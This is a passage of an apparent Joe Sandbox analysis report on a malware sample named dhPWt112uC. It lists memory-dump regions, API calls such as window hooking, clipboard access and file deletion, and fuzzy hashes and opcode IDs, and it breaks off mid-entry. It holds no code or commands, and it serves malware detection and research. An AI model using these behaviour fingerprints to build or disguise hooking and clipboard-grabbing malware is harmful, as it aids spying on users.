                                                                                                            • API String ID: 220874293-0
                                                                                                            • Opcode ID: 4c35a309e5f02ed5c77ba9e3c7addc09de7c471aa0387c71784cc3ba5512b433
                                                                                                            • Instruction ID: d3a2191f739e8f9038eedc8eff01a3593254782f9a1a1de0cb36ff026bd85486
                                                                                                            • Opcode Fuzzy Hash: 4c35a309e5f02ed5c77ba9e3c7addc09de7c471aa0387c71784cc3ba5512b433
                                                                                                            • Instruction Fuzzy Hash: 2E31F1B4D01648DFDB50DFA9C984BCEBBF5AF48304F248059E404BB294DBB4A985CFA5
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.4183028678.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_6f80000_dhPWt112uC.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Clipboard
                                                                                                            • String ID:
                                                                                                            • API String ID: 220874293-0
                                                                                                            • Opcode ID: b5a8cec79ec1ee6af1438c24959c54c63072f223690af87d81bb611abdd25376
                                                                                                            • Instruction ID: f03a9a21b769bdfde0027617dbf8a6c4b5dc16e91cc6d94052bcecce09c76560
                                                                                                            • Opcode Fuzzy Hash: b5a8cec79ec1ee6af1438c24959c54c63072f223690af87d81bb611abdd25376
                                                                                                            • Instruction Fuzzy Hash: 3E31F1B4D01648DFDB50DF99C984BCEBBF5AF48304F248059E404BB294DBB4A985CFA5
                                                                                                            APIs
                                                                                                            • OleInitialize.OLE32(00000000), ref: 06F8BFD5
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.4183028678.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_6f80000_dhPWt112uC.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Initialize
                                                                                                            • String ID:
                                                                                                            • API String ID: 2538663250-0
                                                                                                            • Opcode ID: 33ad99912512790e53c87b91ecb15a850ff6d2bcf0dc2c2fc63130cad94a0431
                                                                                                            • Instruction ID: f0c64d647675ea6dd5fb47fb9c4efc65d028ca3930369a1ba67214f2fd0f60b2
                                                                                                            • Opcode Fuzzy Hash: 33ad99912512790e53c87b91ecb15a850ff6d2bcf0dc2c2fc63130cad94a0431
                                                                                                            • Instruction Fuzzy Hash: F4216D75D047848FCB60DFA9C64579ABFF0EF48314F18489AE489A7661C378A584CF91
                                                                                                            APIs
                                                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 06F8A557
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.4183028678.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_6f80000_dhPWt112uC.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: DuplicateHandle
                                                                                                            • String ID:
                                                                                                            • API String ID: 3793708945-0
                                                                                                            • Opcode ID: 3f628de616c75ae954e963371a4943e392e1518bb3b86cd62c21111210a67030
                                                                                                            • Instruction ID: 6675b28a2496a295405e732f0720057e27c37091946aaeae3ec14bf0a5b3046c
                                                                                                            • Opcode Fuzzy Hash: 3f628de616c75ae954e963371a4943e392e1518bb3b86cd62c21111210a67030
                                                                                                            • Instruction Fuzzy Hash: 6321C4B5D00258DFDB10CF9AD984ADEBBF4EB48310F14845AE958A7350D374A944CFA5
                                                                                                            APIs
                                                                                                            • SetWindowsHookExA.USER32(?,00000000,?,?), ref: 06F8DF0B
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.4183028678.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_6f80000_dhPWt112uC.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: HookWindows
                                                                                                            • String ID:
                                                                                                            • API String ID: 2559412058-0
                                                                                                            • Opcode ID: 9d64da813ba91bb29f47761f12f4c74c05b7800d192b93d371a9fbb44baa05fa
                                                                                                            • Instruction ID: d2ff7204af1637f0cfd4cf8c284858f229688a874b6d184af31b0218f7c6743b
                                                                                                            • Opcode Fuzzy Hash: 9d64da813ba91bb29f47761f12f4c74c05b7800d192b93d371a9fbb44baa05fa
                                                                                                            • Instruction Fuzzy Hash: 342134B5D042099FCB14DF99D844BEEFBF4EF88320F10842AE458A7250C774A940CFA5
                                                                                                            APIs
                                                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 06F8A557
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.4183028678.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_6f80000_dhPWt112uC.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: DuplicateHandle
                                                                                                            • String ID:
                                                                                                            • API String ID: 3793708945-0
                                                                                                            • Opcode ID: 3cf9b4827da923ba40f4c74def5de4dba7c3ec2fbdd089dab4e3a4ea49277b6b
                                                                                                            • Instruction ID: a492059bf9adec45ce985d66553dd08bd49f5346f54a8e921cfaa2c15aca5fbd
                                                                                                            • Opcode Fuzzy Hash: 3cf9b4827da923ba40f4c74def5de4dba7c3ec2fbdd089dab4e3a4ea49277b6b
                                                                                                            • Instruction Fuzzy Hash: DE21E3B5D00248DFDB10CFA9D984ADEBBF4FB48310F14845AE958B7210C374A984CF64
                                                                                                            APIs
                                                                                                            • KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,06F8BA8D), ref: 06F8BB17
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.4183028678.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_6f80000_dhPWt112uC.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CallbackDispatcherUser
                                                                                                            • String ID:
                                                                                                            • API String ID: 2492992576-0
                                                                                                            • Opcode ID: c4fddf8c8804771897a156feac5dd533e24db667eb8ce071d9b1a3ccf17a8668
                                                                                                            • Instruction ID: d890e623bfd3d5c20bcf8bbcddf054edfa090d705a7b8a8f6c9152f007bf48c4
                                                                                                            • Opcode Fuzzy Hash: c4fddf8c8804771897a156feac5dd533e24db667eb8ce071d9b1a3ccf17a8668
                                                                                                            • Instruction Fuzzy Hash: 512147B58043998FCB10EF99D4447DABBF4EF49314F10845AD998A7251C374A584CBA5
                                                                                                            APIs
                                                                                                            • DeleteFileW.KERNEL32(00000000), ref: 031A80B0
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.4166727402.00000000031A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031A0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_31a0000_dhPWt112uC.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: DeleteFile
                                                                                                            • String ID:
                                                                                                            • API String ID: 4033686569-0
                                                                                                            • Opcode ID: 96cd82a7bedf9071850df8595f24331941419c93e55ed6ecdca987a78c552735
                                                                                                            • Instruction ID: 113def4b6b1fbd05d226bef838337e015ebe055fcd5e2b85aa94410fe3cd3f88
                                                                                                            • Opcode Fuzzy Hash: 96cd82a7bedf9071850df8595f24331941419c93e55ed6ecdca987a78c552735
                                                                                                            • Instruction Fuzzy Hash: 062115B5C006599FCB20CF9AC545A9EFBB4AB48320F15852AD858A7250D778A940CFA5
                                                                                                            APIs
                                                                                                            • SetWindowsHookExA.USER32(?,00000000,?,?), ref: 06F8DF0B
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.4183028678.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_6f80000_dhPWt112uC.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: HookWindows
                                                                                                            • String ID:
                                                                                                            • API String ID: 2559412058-0
                                                                                                            • Opcode ID: 5408d0cc4748fb0b81039330fc298c6fa3c30b18a0fc6de6f35516844613f876
                                                                                                            • Instruction ID: 4bee4c151f7fc0c31c17661f8d74a878bcbde67ceb651ac3b3073accc7c77d23
                                                                                                            • Opcode Fuzzy Hash: 5408d0cc4748fb0b81039330fc298c6fa3c30b18a0fc6de6f35516844613f876
                                                                                                            • Instruction Fuzzy Hash: 1C21E0B1D04209DFCB54DF9AC844BEEFBF5AF88320F14842AE459A7290C775A944CFA5
                                                                                                            APIs
                                                                                                            • DeleteFileW.KERNEL32(00000000), ref: 031A80B0
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.4166727402.00000000031A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031A0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_31a0000_dhPWt112uC.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: DeleteFile
                                                                                                            • String ID:
                                                                                                            • API String ID: 4033686569-0
                                                                                                            • Opcode ID: 25c86861ad5c360e4bcec72cd3fe42eb7ac48337771dfc2e6ca413e14d555ceb
                                                                                                            • Instruction ID: 9b1393dd2c7ea2d8cf94368ccbd527d560f675aa53862b063161f2063a6e4537
                                                                                                            • Opcode Fuzzy Hash: 25c86861ad5c360e4bcec72cd3fe42eb7ac48337771dfc2e6ca413e14d555ceb
                                                                                                            • Instruction Fuzzy Hash: 2E1103B5C0065A9FCB24CF9AC544BAEFBB4BB48320F15812AD858B7250D778A944CFA5
                                                                                                            APIs
                                                                                                            • GlobalMemoryStatusEx.KERNEL32(?), ref: 031AF107
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.4166727402.00000000031A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031A0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_31a0000_dhPWt112uC.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: GlobalMemoryStatus
                                                                                                            • String ID:
                                                                                                            • API String ID: 1890195054-0
                                                                                                            • Opcode ID: e8803b840f3100a98e0fc395c9934b54c86c7aad0733bf46fecfb67beed85447
                                                                                                            • Instruction ID: fa5d641a8f8426a64c5150e62c16420b4233308a218b9a3b3721288dbf8922cd
                                                                                                            • Opcode Fuzzy Hash: e8803b840f3100a98e0fc395c9934b54c86c7aad0733bf46fecfb67beed85447
                                                                                                            • Instruction Fuzzy Hash: DA1112B1C00669DFCB10CF9AC944BDEFBF4AB48320F14812AD818B7250D378A940CFA5
                                                                                                            APIs
                                                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 06F856F6
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.4183028678.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_6f80000_dhPWt112uC.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: HandleModule
                                                                                                            • String ID:
                                                                                                            • API String ID: 4139908857-0
                                                                                                            • Opcode ID: 20c3d9fc61d0df522d412c7822283532cdcd4eb98f35b0712a7ff1a24d1eb7e2
                                                                                                            • Instruction ID: 2a15bdfd56c318f5535ec6da9da6e10e2ebd5a091c9967d2b350da188a057930
                                                                                                            • Opcode Fuzzy Hash: 20c3d9fc61d0df522d412c7822283532cdcd4eb98f35b0712a7ff1a24d1eb7e2
                                                                                                            • Instruction Fuzzy Hash: 05110FB6D00249CFCB20DF9AD844ADEFBF4AF89320F10846AD429B7610C375A585CFA5
                                                                                                            APIs
                                                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 06F856F6
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.4183028678.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_6f80000_dhPWt112uC.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: HandleModule
                                                                                                            • String ID:
                                                                                                            • API String ID: 4139908857-0
                                                                                                            • Opcode ID: 9335118fe8c2557f23f9bc0ea294f03a655333fb79c849d2278b9eb651cc513d
                                                                                                            • Instruction ID: 5c0cff06051d9f901ff8ec4355730f362947870b503517aed98a7cd1780ea901
                                                                                                            • Opcode Fuzzy Hash: 9335118fe8c2557f23f9bc0ea294f03a655333fb79c849d2278b9eb651cc513d
                                                                                                            • Instruction Fuzzy Hash: 9B11FDB6C00349CFDB50DF9AC848A9EFBF4EB89220F10846AD829B7210D375A545CFA5
                                                                                                            APIs
                                                                                                            • OleInitialize.OLE32(00000000), ref: 06F8BFD5
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.4183028678.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_6f80000_dhPWt112uC.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Initialize
                                                                                                            • String ID:
                                                                                                            • API String ID: 2538663250-0
                                                                                                            • Opcode ID: 48632a810790c0223c8cbdead1083864b294f5dbc06d149ce1fe8d17536c24d6
                                                                                                            • Instruction ID: 357ba8e79b8883309443fc024e5da789f0cc4a7e2b790be1d405338d0513f73c
                                                                                                            • Opcode Fuzzy Hash: 48632a810790c0223c8cbdead1083864b294f5dbc06d149ce1fe8d17536c24d6
                                                                                                            • Instruction Fuzzy Hash: E51112B5904348CFCB20DF9AC888BDEBBF4EB48324F24845AE558B7210C374A944CFA5
                                                                                                            APIs
                                                                                                            • KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,06F8BA8D), ref: 06F8BB17
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.4183028678.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_6f80000_dhPWt112uC.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CallbackDispatcherUser
                                                                                                            • String ID:
                                                                                                            • API String ID: 2492992576-0
                                                                                                            • Opcode ID: 9a615afd75fbf74e53705909f05fd6a0af6489d9d08084a4cc4d26cd9d6ec3dd
                                                                                                            • Instruction ID: 95f6e4149dedc55e983c88dbeaf9d14984cb87d8ed585724b55372ccba1edb67
                                                                                                            • Opcode Fuzzy Hash: 9a615afd75fbf74e53705909f05fd6a0af6489d9d08084a4cc4d26cd9d6ec3dd
                                                                                                            • Instruction Fuzzy Hash: 1E1106B1900248CFCB50DF9AD444BDEBBF4EB48324F20845AE559A7250C774A944CFA5
                                                                                                            APIs
                                                                                                            • OleInitialize.OLE32(00000000), ref: 06F8BFD5
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.4183028678.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_6f80000_dhPWt112uC.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Initialize
                                                                                                            • String ID:
                                                                                                            • API String ID: 2538663250-0
                                                                                                            • Opcode ID: c1db743c4a9ad7e6c08610a4670c3bdfef2366b3e0a10bf8de2a8340bb041306
                                                                                                            • Instruction ID: 3d5372a4ba980c3fb7531211c83113dbbdc59a9c1c3c1eb3a1f9fcc832e01a49
                                                                                                            • Opcode Fuzzy Hash: c1db743c4a9ad7e6c08610a4670c3bdfef2366b3e0a10bf8de2a8340bb041306
                                                                                                            • Instruction Fuzzy Hash: 6F1100B5800348CFCB20DF99C588BDEBBF4EF48324F24885AD558A7211C334A585CFA5
                                                                                                            APIs
                                                                                                            • KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,06F8BA8D), ref: 06F8BB17
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.4183028678.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_6f80000_dhPWt112uC.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CallbackDispatcherUser
                                                                                                            • String ID:
                                                                                                            • API String ID: 2492992576-0
                                                                                                            • Opcode ID: 41ed145c6f06cb5b1367ffae31e4af08feb48474b68eda77f13bc703a748a969
                                                                                                            • Instruction ID: 0c178edd6efeabd7fc29192a0ddb74210a3e7dc16898f0e2bec05a209e03fc2f
                                                                                                            • Opcode Fuzzy Hash: 41ed145c6f06cb5b1367ffae31e4af08feb48474b68eda77f13bc703a748a969
                                                                                                            • Instruction Fuzzy Hash: 661100B5C00249CFCB20DF99D984BDEBBF4AB48324F20845AD558B7250C374A584CFA5
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.4183149098.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_6f90000_dhPWt112uC.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: PH^q
                                                                                                            • API String ID: 0-2549759414
                                                                                                            • Opcode ID: c553a93bea3580f7a941cba164fdf420ae4ebcd02e4e2b75be00b1c3a607aa3b
                                                                                                            • Instruction ID: 6b66093534ef371400129831138f4c167adebff2615161d90cf21a869d2f8037
                                                                                                            • Opcode Fuzzy Hash: c553a93bea3580f7a941cba164fdf420ae4ebcd02e4e2b75be00b1c3a607aa3b
                                                                                                            • Instruction Fuzzy Hash: 2E41D070E0060A9FEF65DFA5D85469EBBB6FF85300F20492AE405E7340DBB5D846CBA1
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.4183149098.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_6f90000_dhPWt112uC.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: PH^q
                                                                                                            • API String ID: 0-2549759414
                                                                                                            • Opcode ID: 03f6654d17af56e39e30ff0dd6d2e7eb976ca4134e15f574d88645ae8a34c39f
                                                                                                            • Instruction ID: bd98d0e1eb11d9a1be1f4019cc103c54b1f3c891cee39dd92434fc09e0d68144
                                                                                                            • Opcode Fuzzy Hash: 03f6654d17af56e39e30ff0dd6d2e7eb976ca4134e15f574d88645ae8a34c39f
                                                                                                            • Instruction Fuzzy Hash: B3311030B202019FEF599B74D45466E7BE2AF89600F20442DD006EB394EF35DE06C7A2
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.4183149098.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_6f90000_dhPWt112uC.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: \Ocq
                                                                                                            • API String ID: 0-2995510325
                                                                                                            • Opcode ID: 6599d118d20af3ba2ab7e96c3a3ba221c9123cd265a0f25f58f6b4c074c66ec4
                                                                                                            • Instruction ID: 48611478cc2d449dcbe8a94f4530bd9d311ca6f51440194e0f6d9d27271629bd
                                                                                                            • Opcode Fuzzy Hash: 6599d118d20af3ba2ab7e96c3a3ba221c9123cd265a0f25f58f6b4c074c66ec4
                                                                                                            • Instruction Fuzzy Hash: 36F0DA70A20119DBDB14DF94E859BAEBBB2FF94704F204119E502A7298CB701C06CB90
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.4183149098.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_6f90000_dhPWt112uC.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: b44f35934a5e00dd5a4aff8111f536e507bdeba8b4ee77efe035bfaddb8905d4
                                                                                                            • Instruction ID: 25a1f2d0db51a86bfb5db9ca05a54324298e5337af44a2e7aa88b3246221f8b2
                                                                                                            • Opcode Fuzzy Hash: b44f35934a5e00dd5a4aff8111f536e507bdeba8b4ee77efe035bfaddb8905d4
                                                                                                            • Instruction Fuzzy Hash: A461D071F000114FEF549A7EC884A6FBADBAFC4624B25443AD80EDB364DE66DD0287D2
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.4183149098.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_6f90000_dhPWt112uC.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 7f6c8b1b91638d58e495b0f57b16f59f17b3c139086ab3a8d2ae799360973eef
                                                                                                            • Instruction ID: 7754419724a95f433cc693b0c126dbcb70aa7ce9c0c1f1f3293c85e0af6057c2
                                                                                                            • Opcode Fuzzy Hash: 7f6c8b1b91638d58e495b0f57b16f59f17b3c139086ab3a8d2ae799360973eef
                                                                                                            • Instruction Fuzzy Hash: 38814F31F002059FEF54DFA9D49065EB7F6AF89704F208529D50AEB394EB74EC428B91
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.4183149098.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_6f90000_dhPWt112uC.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 8107ba55acb728ca56f5ebebf92602d17e326a24fc80c60c49cdab66d9d6fbab
                                                                                                            • Instruction ID: 391a289612b87d8ce361715e5ec8e952ab142256d8dc7331c26a80853974b8bc
                                                                                                            • Opcode Fuzzy Hash: 8107ba55acb728ca56f5ebebf92602d17e326a24fc80c60c49cdab66d9d6fbab
                                                                                                            • Instruction Fuzzy Hash: 64916E30E102198FDF60DF68C890B9DB7B1FF99304F208599D549AB395DB70AA86CF91
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.4183149098.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_6f90000_dhPWt112uC.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 07054411aaa3c26d8d175d46fb6462289b2dd66c9c64790cc5c45e62cddf36af
                                                                                                            • Instruction ID: 99323ff2bb1be89bc6067ea58f39d4ee1ac6e2e1213ade2a9c78a71487949c0c
                                                                                                            • Opcode Fuzzy Hash: 07054411aaa3c26d8d175d46fb6462289b2dd66c9c64790cc5c45e62cddf36af
                                                                                                            • Instruction Fuzzy Hash: 9B915E34E102198BEF60DF68C880B9DB7B1FF99304F208599D54DAB354DB70AA86CF91
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.4183149098.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_6f90000_dhPWt112uC.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 280287ef44d64eb79fcda5d426a9ffab25545822321a83fc00d6b5cd5d691825
                                                                                                            • Instruction ID: 7fcb3d6db44ce81ad0e70828c98eae61ecdff3c76095d9a975fb56ffe59aac5c
                                                                                                            • Opcode Fuzzy Hash: 280287ef44d64eb79fcda5d426a9ffab25545822321a83fc00d6b5cd5d691825
                                                                                                            • Instruction Fuzzy Hash: DC711A74A012099FDF54DFA9D980AADBBF6FF88314F148429D409EB364DB30E846CB50
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.4183149098.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_6f90000_dhPWt112uC.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: d118c7c091f0f31da9110e3d01adf1377414b2c4ab59b61d410cc676469ca4bb
                                                                                                            • Instruction ID: 993887b6226f03575adb8821ec4ad3a979395889961aa6db18ff440ac838bb74
                                                                                                            • Opcode Fuzzy Hash: d118c7c091f0f31da9110e3d01adf1377414b2c4ab59b61d410cc676469ca4bb
                                                                                                            • Instruction Fuzzy Hash: 63710974A012499FEB54DFA9D980AAEBBF6FF88314F148429D409DB364DB30EC46CB51
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.4183149098.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_6f90000_dhPWt112uC.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 767f7cd61e39feaa6132504ef3af959b50a38741143c8d0651720c9041d15ff8
                                                                                                            • Instruction ID: 35b2db217e0ac82cd9c6b31c6fcf2ae37c34f513671db6fb81882fdb911a3ab1
                                                                                                            • Opcode Fuzzy Hash: 767f7cd61e39feaa6132504ef3af959b50a38741143c8d0651720c9041d15ff8
                                                                                                            • Instruction Fuzzy Hash: C351D171E02105DFEF54AB78E4442ADBBB2EF88315F10886AE10AD7354DB358945CBA1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.4183149098.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_6f90000_dhPWt112uC.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 34139518827494bff42541076eb5394fb278e163f0c863ea9dbfcd3e31b5202c
                                                                                                            • Instruction ID: c1a18589ae303ed92d62248587126473afcc3c2fbd016269ef9695153f73d083
                                                                                                            • Opcode Fuzzy Hash: 34139518827494bff42541076eb5394fb278e163f0c863ea9dbfcd3e31b5202c
                                                                                                            • Instruction Fuzzy Hash: A151BF70F212059BFF645A6CDD54B3F266EEB89310F20482AE50AD77A4C929CC8583B2
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.4183149098.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_6f90000_dhPWt112uC.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: e76d0f86918d1d3123907e62feb4444ac70aafa8f7723602dd24699e5f89e543
                                                                                                            • Instruction ID: 9845d624db20a5d2bfdf2b12c3bf82b1c99c543fe4a1e834d1e94e7e193f5803
                                                                                                            • Opcode Fuzzy Hash: e76d0f86918d1d3123907e62feb4444ac70aafa8f7723602dd24699e5f89e543
                                                                                                            • Instruction Fuzzy Hash: 4B51B370F212059BFF645A6CDD5473F266EDB8D310F20482AE50AD77A4C96DCC8543B2
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.4183149098.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_6f90000_dhPWt112uC.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 3f3930c8d9e2b0dbfdb244c0a15c99d2477a8ef0b5561a5c5c5d3e62676e44ca
                                                                                                            • Instruction ID: aa5f1862d0302c2a27daccbd406695fc2fa802d6a100506ebb6b301e41241db2
                                                                                                            • Opcode Fuzzy Hash: 3f3930c8d9e2b0dbfdb244c0a15c99d2477a8ef0b5561a5c5c5d3e62676e44ca
                                                                                                            • Instruction Fuzzy Hash: 59417C71E002098FEF71CFA9C880AAFFBB2EB95314F10492AE156D7651D331E945CBA0
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.4183149098.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_6f90000_dhPWt112uC.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
